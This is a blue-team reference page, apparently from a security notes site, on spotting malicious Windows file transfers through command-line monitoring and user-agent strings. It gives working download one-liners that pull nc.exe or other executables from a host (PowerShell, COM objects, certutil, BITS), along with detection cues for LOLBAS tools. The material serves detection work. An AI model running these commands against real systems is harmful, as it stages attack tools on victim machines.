Detection

🛡️ Detection: How Malicious File Transfers Are Caught

While attackers aim to “live off the land,” defenders aim to detect even the sneakiest moves — and that starts with knowing what to look for.

Even simple case changes (InVoKe-WeBReQueST) can bypass basic blacklists, so defenders must get smarter with whitelisting, user agent inspection, and behavioral detection. 🧬

🧩 Command-Line Monitoring

🔍 Blacklisting:

❌ Fragile
❌ Easy to bypass with obfuscation

✅ Whitelisting:

✅ Robust and context-aware
✅ Detects unknown or abnormal behavior
🧠 Best implemented with baselining

🌐 User-Agent Strings: Silent Snitches

HTTP/HTTPS clients include a user-agent string that tells servers who they are. This can reveal:

🧭 Tool usage (e.g., curl, PowerShell)
🧰 Scripting frameworks (e.g., Python, WinHttp, Msxml2)
🔍 Potential unauthorized activity

Organizations should:

Maintain a baseline of legitimate user agents
Create alerting rules for unknown or uncommon agents
Use SIEM or EDR to enrich HTTP logs with user-agent tagging

📊 Common Tool Detection Signatures

Here’s how some popular tools appear to defenders 👇

💻 PowerShell Web Cmdlets

Client

Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

Server Log

User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

📌 Easy to fingerprint via PowerShell version.

🌐 WinHttpRequest COM Object

Client

$h = New-Object -com WinHttp.WinHttpRequest.5.1
$h.open('GET','http://target/file.exe',$false)
$h.send()

Server Log

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

📌 Looks like IE 4.0 era — very suspicious today 🚩

🧱 Msxml2.XMLHTTP COM Object

Client

$h = New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://target/file.exe',$false)
$h.send()

Server Log

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; ...)

📌 Pretends to be old IE — not used by modern apps.

🧾 Certutil.exe

Client

certutil -urlcache -split -f http://target/nc.exe

Server Log

User-Agent: Microsoft-CryptoAPI/10.0

📌 Easy to detect, AMSI flags this now.

📦 BITS Transfer

Client

Import-Module bitstransfer
Start-BitsTransfer http://target/nc.exe C:\Temp\nc.exe

Server Log

User-Agent: Microsoft BITS/7.8

📌 Looks like a legit Windows Update or AV call — more stealthy 👀

✅ Detection Tips for Blue Teams

🧠 What to Watch

🕵️ Why It Matters

Abnormal user-agent strings

Reveals use of tools like sqlmap, curl, PowerShell, certutil, etc.

New or rare command-line executions

Especially for tools like bitsadmin, mshta, wscript

File transfers to non-standard directories

Suspicious destinations like C:\Users\Public

Use of legacy COM objects

Ex: WinHttpRequest, Msxml2 (usually attacker-generated)

Execution from temp folders or appdata

Common drop zones for payloads

🔬 Summary

✅ Create whitelists of expected binaries, arguments, and user-agents
🚫 Alert on blacklisted LOLBAS/GTFOBins and unusual HTTP headers
🧠 Analyze behavioral patterns (downloads + process launch + persistence)
🔄 Monitor continuously using SIEM, EDR, Sysmon, and NetFlow

PreviousDetect or Be Detected NextEvade Detection

Last updated 10 months ago

hashtag🛡️ Detection: How Malicious File Transfers Are Caught

hashtag🧩 Command-Line Monitoring

hashtag🌐 User-Agent Strings: Silent Snitches

hashtag📊 Common Tool Detection Signatures

hashtag💻 PowerShell Web Cmdlets

hashtag🌐 WinHttpRequest COM Object

hashtag🧱 Msxml2.XMLHTTP COM Object

hashtag🧾 Certutil.exe

hashtag📦 BITS Transfer

hashtag✅ Detection Tips for Blue Teams

hashtag🔬 Summary

🛡️ Detection: How Malicious File Transfers Are Caught

🧩 Command-Line Monitoring

🌐 User-Agent Strings: Silent Snitches

📊 Common Tool Detection Signatures

💻 PowerShell Web Cmdlets

🌐 WinHttpRequest COM Object

🧱 Msxml2.XMLHTTP COM Object

🧾 Certutil.exe

📦 BITS Transfer

✅ Detection Tips for Blue Teams

🔬 Summary